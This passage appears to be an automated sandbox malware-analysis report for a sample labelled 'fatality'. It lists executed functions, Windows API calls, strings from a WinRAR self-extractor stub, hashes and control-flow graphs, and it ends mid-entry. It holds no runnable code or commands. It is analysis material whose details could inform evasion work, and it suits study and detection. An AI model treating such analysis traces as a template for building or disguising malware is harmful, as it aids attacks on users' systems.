SetFileAttributesW 41039->41158 41159 de9155 5 API calls __EH_prolog 41040->41159 41043 de9090 41046 dea4ed SetFileAttributesW 41043->41046 41043->41049 41044->41043 41045 de903e 41044->41045 41044->41049 41142 de9f09 SetEndOfFile 41044->41142 41143 de9da2 41045->41143 41046->41049 41049->41008 41050 de9085 41051 de9620 CloseHandle 41050->41051 41051->41043 41053 de16a4 41052->41053 41054 de8420 41053->41054 41055 de95ca 41053->41055 41056 de95d1 41053->41056 41054->40906 41057 de974e DeleteFileW 41055->41057 41058 de9620 CloseHandle 41056->41058 41057->41054 41058->41054 41060 decf4d 41059->41060 41061 decf54 41059->41061 41062 de981a SetFilePointer 41060->41062 41061->40965 41062->41061 41064 dfde78 _swprintf 41063->41064 41065 dfd4d4 16 API calls 41064->41065 41066 df1b7c 41065->41066 41066->40929 41068 de19bb 41067->41068 41069 de19bf 41067->41069 41068->40972 41071 de18f6 41069->41071 41072 de1908 41071->41072 41073 de1945 41071->41073 41074 de3b2d 2 API calls 41072->41074 41079 de3fa3 41073->41079 41077 de1928 41074->41077 41077->41068 41082 de3fac 41079->41082 41080 de3b2d 2 API calls 41080->41082 41081 de1966 41081->41077 41083 de1e50 41081->41083 41082->41080 41082->41081 41084 de1e5a __EH_prolog 41083->41084 41087 de3bba 41084->41087 41086 de1e84 _wcslen 41086->41077 41088 de3bc4 __EH_prolog 41087->41088 41097 de3bda 41088->41097 41098 df3377 41088->41098 41091 de3c71 41091->41097 41106 deab1a 41091->41106 41092 de3d41 41093 de3dd7 41092->41093 41094 de3dc7 41092->41094 41117 df3020 21 API calls 41093->41117 41110 de9215 41094->41110 41097->41086 41099 df338c ___std_exception_copy 41098->41099 41100 df341c 41099->41100 41102 df3440 _abort 41099->41102 41103 df34c6 _com_raise_error 41099->41103 41118 df32aa 20 API calls 3 library calls 41100->41118 41102->41091 41105 df3524 41103->41105 41119 df3106 20 API calls 41103->41119 41105->41091 41107 deab28 41106->41107 41109 deab32 41106->41109 41108 dfeb38 UnhandledExceptionFilter 41107->41108 41108->41109 41109->41092 41111 de921f __EH_prolog 41110->41111 41120 ded114 41111->41120 41113 de9243 41115 ded114 20 API calls 41113->41115 41116 de928a 41113->41116 41127 ded300 WriteFile UnhandledExceptionFilter __InternalCxxFrameHandler 41113->41127 41115->41113 41116->41097 41117->41097 41118->41102 41119->41103 41123 ded12a __InternalCxxFrameHandler 41120->41123 41121 ded29a 41122 ded0cb 6 API calls 41121->41122 41125 ded291 41121->41125 41122->41125 41123->41121 41124 df8c8d 19 API calls 41123->41124 41123->41125 41126 deac05 UnhandledExceptionFilter 41123->41126 41124->41123 41125->41113 41126->41123 41127->41113 41128->40981 41129->40981 41131 de5d2a 41130->41131 41161 de5c4b 41131->41161 41134 de5d5d 41135 de5d95 41134->41135 41166 deb1dc CharUpperW _wcslen ___vcrt_FlsGetValue 41134->41166 41135->40995 41137 de8186 41136->41137 41138 de8232 41137->41138 41173 debe5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 41137->41173 41172 df1fac CharUpperW 41138->41172 41141 de823b 41141->40997 41142->41045 41144 de9db3 41143->41144 41145 de9e3f SetFileTime 41144->41145 41145->41050 41146->40989 41147->40994 41148->40994 41149->41002 41150->41009 41151->41005 41152->41009 41154 de98c5 GetFileType 41153->41154 41155 de98c2 41153->41155 41154->41155 41155->41020 41156->41023 41157->41044 41158->41044 41159->41044 41160->41044 41167 de5b48 41161->41167 41163 de5c6c 41163->41134 41165 de5b48 CharUpperW 41165->41163 41166->41134 41169 de5b52 41167->41169 41168 de5c3a 41168->41163 41168->41165 41169->41168 41171 deb1dc CharUpperW _wcslen ___vcrt_FlsGetValue 41169->41171 41171->41169 41172->41141 41173->41138 41175 dea6a8 41174->41175 41176 dea6c1 FindFirstFileW 41175->41176 41179 dea6fe 41175->41179 41177 dea6d0 41176->41177 41176->41179 41178 dea6e4 FindFirstFileW 41177->41178 41177->41179 41178->41179 41179->40941 41180->40837 41181->40837 41182->40840 41184 de1fe8 41183->41184 41185 de1a04 2 API calls 41184->41185 41186 de1ff5 41184->41186 41185->41186 41186->40852

                                                                    Executed Functions

                                                                    Function 00DFB7E0 Relevance: 84.7, APIs: 37, Strings: 11, Instructions: 731windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DFB7E5
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFB8D1
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB8EF
                                                                    • IsDialogMessageW.USER32(?,?), ref: 00DFB902
                                                                    • TranslateMessage.USER32(?), ref: 00DFB910
                                                                    • DispatchMessageW.USER32(?), ref: 00DFB91A
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DFB93D
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFB960
                                                                    • GetDlgItem.USER32(?,00000068), ref: 00DFB983
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFB99E
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFB9B1
                                                                      • Part of subcall function 00DFD453: _wcschr.LIBVCRUNTIME ref: 00DFD45C
                                                                      • Part of subcall function 00DFD453: _wcslen.LIBCMT ref: 00DFD47D
                                                                    • SetFocus.USER32(00000000), ref: 00DFB9B8
                                                                    • _swprintf.LIBCMT ref: 00DFBA24
                                                                      • Part of subcall function 00DFD4D4: GetDlgItem.USER32(00000068,?), ref: 00DFD4E8
                                                                      • Part of subcall function 00DFD4D4: ShowWindow.USER32(00000000,00000005,?,?), ref: 00DFD510
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0
                                                                    • _swprintf.LIBCMT ref: 00DFBAC2
                                                                    • _swprintf.LIBCMT ref: 00DFBB7C
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00DFBC6F
                                                                    • _swprintf.LIBCMT ref: 00DFBD1E
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBD7D
                                                                    • SetDlgItemTextW.USER32(?,00000065,00E135F4), ref: 00DFBD94
                                                                    • GetDlgItem.USER32(?,00000065), ref: 00DFBD9D
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFBDAC
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DFBDBB
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBE68
                                                                    • _wcslen.LIBCMT ref: 00DFBEBE
                                                                    • _swprintf.LIBCMT ref: 00DFBEE8
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFBF32
                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DFBF4C
                                                                    • GetDlgItem.USER32(?,00000068), ref: 00DFBF55
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DFBF6B
                                                                    • GetDlgItem.USER32(?,00000066), ref: 00DFBF85
                                                                    • SetWindowTextW.USER32(00000000,00E2A472), ref: 00DFBFA7
                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DFC007
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC01A
                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00DFC0BD
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00DFC197
                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DFC1D9
                                                                      • Part of subcall function 00DFC73F: __EH_prolog.LIBCMT ref: 00DFC744
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC1FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$Dialog$H_prologLong_wcslen$DispatchEnableExecuteFocusParamShellShowTranslate_wcschr
                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$runas$winrarsfxmappingfile.tmp
                                                                    • API String ID: 4159181167-2266193177
                                                                    • Opcode ID: 75ef223892eab08976b19b6c48bbbdde4c01c87d292f0adb6cb904b0fb9b9ec6
                                                                    • Instruction ID: 7e3b78bb738f0f984e2efdbeadb5648c1b8c05611ff3328d76c0b7daa73be21f
                                                                    • Opcode Fuzzy Hash: 75ef223892eab08976b19b6c48bbbdde4c01c87d292f0adb6cb904b0fb9b9ec6
                                                                    • Instruction Fuzzy Hash: 6B42E47094028CBEEB21AB71DD4AFBE7B6CAB11700F098156F744B61D2CB749A49CB31
                                                                    Function 00DFDF1E Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 195windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 748 dfdf1e-dfdf66 call df0863 call dfa64d call dfac16 call dffff0 758 dfdf68-dfdf74 call dfc5c4 748->758 759 dfdfe6-dfe0f4 call de4092 LoadIconW call dfb6dd call deda42 call df90b7 * 2 DialogBoxParamW call df9178 * 2 748->759 763 dfdf76-dfdf8d 758->763 764 dfdfe0-dfdfe1 call dfdbde 758->764 796 dfe0fd-dfe104 759->796 797 dfe0f6 759->797 769 dfdf8f-dfdf9e 763->769 770 dfdfd6-dfdfde 763->770 764->759 775 dfdfcd-dfdfd4 769->775 776 dfdfa0-dfdfcb call e00320 call dfdbde 769->776 770->759 775->770 776->775 798 dfe10b-dfe11c call def279 796->798 799 dfe106 call dfae2f 796->799 797->796 803 dfe11e-dfe124 call dfee5c 798->803 804 dfe12a-dfe13d DeleteObject 798->804 799->798 810 dfe129 803->810 805 dfe13f-dfe140 DeleteObject 804->805 806 dfe146-dfe14d 804->806 805->806 808 dfe14f-dfe156 806->808 809 dfe167-dfe175 806->809 808->809 811 dfe158-dfe162 call de6d83 808->811 812 dfe189-dfe196 809->812 813 dfe177-dfe17d call dfdc3b 809->813 810->804 811->809 816 dfe1ba-dfe1ce call dfac7c 812->816 817 dfe198-dfe1a4 812->817 813->812 820 dfe1a6-dfe1ae 817->820 821 dfe1b4-dfe1b6 817->821 820->816 824 dfe1b0-dfe1b2 820->824 821->816 822 dfe1b8 821->822 822->816 824->816
                                                                    APIs
                                                                      • Part of subcall function 00DFAC16: OleInitialize.OLE32(00000000), ref: 00DFAC2F
                                                                      • Part of subcall function 00DFAC16: SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70
                                                                    • _swprintf.LIBCMT ref: 00DFE048
                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00DFE078
                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00DFE0C9
                                                                    • DeleteObject.GDI32 ref: 00DFE130
                                                                    • DeleteObject.GDI32(?), ref: 00DFE140
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteObject$DialogIconInitializeLoadMallocParam_swprintf
                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                    • API String ID: 203082903-632967962
                                                                    • Opcode ID: 7b7a9238761bd65da18470baff2c0bdb07879446a2685b14db1726b2e7ea57ed
                                                                    • Instruction ID: 87ccb68cb25ff7ae8b5b7c721df1a3ef9cc8825e76d968bc76618ee9f2753ec3
                                                                    • Opcode Fuzzy Hash: 7b7a9238761bd65da18470baff2c0bdb07879446a2685b14db1726b2e7ea57ed
                                                                    • Instruction Fuzzy Hash: 2561C371904388AFD320AF76EC49F7B7BA9EF49700F058429FA45B22A1DA749948C771
                                                                    Function 00DEA69B Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1091 dea69b-dea6bf call dfec50 1094 dea727-dea730 1091->1094 1095 dea6c1-dea6ce FindFirstFileW 1091->1095 1096 dea742-dea7ff call df0602 call dec310 call df15da * 3 1094->1096 1101 dea732-dea740 1094->1101 1095->1096 1097 dea6d0-dea6e2 call debb03 1095->1097 1112 dea804-dea811 1096->1112 1104 dea6fe-dea707 1097->1104 1105 dea6e4-dea6fc FindFirstFileW 1097->1105 1109 dea719-dea722 1101->1109 1113 dea709-dea70c 1104->1113 1114 dea717 1104->1114 1105->1096 1105->1104 1109->1112 1113->1114 1116 dea70e-dea711 1113->1116 1114->1109 1116->1114 1119 dea713-dea715 1116->1119 1119->1109
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1818217402-0
                                                                    • Opcode ID: c6f0e867b7777e239e8e85059b81a45ab47770dfb9a2e796eb138aec33029bf8
                                                                    • Instruction ID: d3a4f651df838d15c258a79cb02229efc3e3e92c5290c387a3c5a99908d4c78a
                                                                    • Opcode Fuzzy Hash: c6f0e867b7777e239e8e85059b81a45ab47770dfb9a2e796eb138aec33029bf8
                                                                    • Instruction Fuzzy Hash: 9441717650055AABCB25EF69CC84AEDB7B8FB48350F144196E569E3200D734AE94CFA0
                                                                    Function 05256861 Relevance: 3.0, APIs: 2, Instructions: 30nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05256875
                                                                    • GetSystemInfo.KERNELBASE(?), ref: 05256887
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: InfoInformationProcessQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 1993426926-0
                                                                    • Opcode ID: 1fb10b1f584574fc7e7ef76664c1f67970bd54e56cc62cee208ca94fa62fd050
                                                                    • Instruction ID: 44ff9c54197081f63a4720ae10fbd495e39f3372751889b54501d585c55d2a67
                                                                    • Opcode Fuzzy Hash: 1fb10b1f584574fc7e7ef76664c1f67970bd54e56cc62cee208ca94fa62fd050
                                                                    • Instruction Fuzzy Hash: C2F01C7660421DEBCB04DF99DC49EDEBBB8EB09740B008029FD06D7250DB30A910CBE0
                                                                    Function 00DE848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 923799d6d75aba5546986b8fa1695d81022df9af3034dea9e5edbd439fcb9f90
                                                                    • Instruction ID: 31ab248d924ffa957755134ef82008273abdf85df2200d34dd2e643c19524aa9
                                                                    • Opcode Fuzzy Hash: 923799d6d75aba5546986b8fa1695d81022df9af3034dea9e5edbd439fcb9f90
                                                                    • Instruction Fuzzy Hash: A382F9709042C5AEDF15EF65C891BFABBB9AF15300F0C41B9E84D9B182DB315A88DB70
                                                                    Function 00E07DEE Relevance: .0, Instructions: 21COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feb405079cc966e0d4953044817479f597fe7b0244b6a474c17a8f47bc8e2012
                                                                    • Instruction ID: 6db7026b303a479e86bb1d265cf870bcf0a316a04c52e27191b5947bf9181a16
                                                                    • Opcode Fuzzy Hash: feb405079cc966e0d4953044817479f597fe7b0244b6a474c17a8f47bc8e2012
                                                                    • Instruction Fuzzy Hash: 5FE04F31441148EFCF01AF21DD099893FAAEB04341F008458F849AA172CB36EE96CB90
                                                                    Function 00DF0888 Relevance: 122.8, APIs: 2, Strings: 68, Instructions: 267COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00DF0C9C
                                                                    • _swprintf.LIBCMT ref: 00DF0D4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile_swprintf
                                                                    • String ID: ,<$D=$DXGIDebug.dll$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$|<$|<
                                                                    • API String ID: 1328629133-1521521131
                                                                    • Opcode ID: 425be3904697bf4e46e69d4f1e8bddd8431adeb45a6a8d53815f5c6a5d83131f
                                                                    • Instruction ID: 4cd7e689a33ae64e9bcac46e5ed6ec9a7c0bd62c8f420d050071334870fb3b12
                                                                    • Opcode Fuzzy Hash: 425be3904697bf4e46e69d4f1e8bddd8431adeb45a6a8d53815f5c6a5d83131f
                                                                    • Instruction Fuzzy Hash: C6B175F0108384AED7309F61984ABDFBAE8EBC5704F51991DF28977251C7B08689CB62
                                                                    Function 00DFC73F Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 428windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
